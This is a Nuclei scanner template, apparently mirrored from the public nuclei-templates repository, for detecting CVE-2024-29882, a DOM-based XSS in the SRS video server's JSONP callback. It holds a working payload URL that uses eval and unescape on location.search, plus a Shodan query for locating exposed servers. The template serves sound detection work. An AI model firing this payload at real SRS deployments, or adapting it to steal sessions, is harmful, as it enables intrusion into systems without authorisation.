admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 15:53:33 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
bb0b9cdb7c72c5f2ca22991dfd584c384ed92f05
nuclei-templates/headless/cves/2024/CVE-2024-29882.yaml
ghost bb0b9cdb7c chore: update EPSS scores 🤖
2026-01-25 02:46:43 +00:00

53 lines
2.0 KiB
YAML
Raw Blame History

id: CVE-2024-29882
info:
name: HTTP API DOM - XSS on JSONP callback
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: |
SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
remediation: |
Upgrade Simple Realtime Server (SRS) to version 5.0.210, 6.0.121, or later that properly sanitizes the JSONP callback parameter.
impact: |
Attackers can execute arbitrary JavaScript in the context of the victim's browser, potentially leading to session hijacking or defacement.
reference:
- https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
- https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-29882
cwe-id: CWE-79
epss-score: 0.07702
epss-percentile: 0.9168
metadata:
verified: true
max-request: 1
vendor: ossrs
product: simple_realtime_server
shodan-query: http.favicon.hash:1386054408
tags: cve,cve2024,srs,dom,xss,vuln
headless:
- steps:
- args:
url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
action: navigate
- action: waitdialog
name: object_dom
matchers-condition: and
matchers:
- type: dsl
dsl:
- object_dom == true
- type: word
part: body
words:
- "<title>SRS"
- "ConnectSRS</a>"
condition: or
case-insensitive: true
# digest: 4a0a004730450221008c78587c6163b3c29c5351d08c0564e3db6bdb7c9743e9e1f2e2711609e1d33e022078bdfb29f0643d958639aaf4aebb28480c9044094bc2080558bd1cd6bfb9f6d6:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink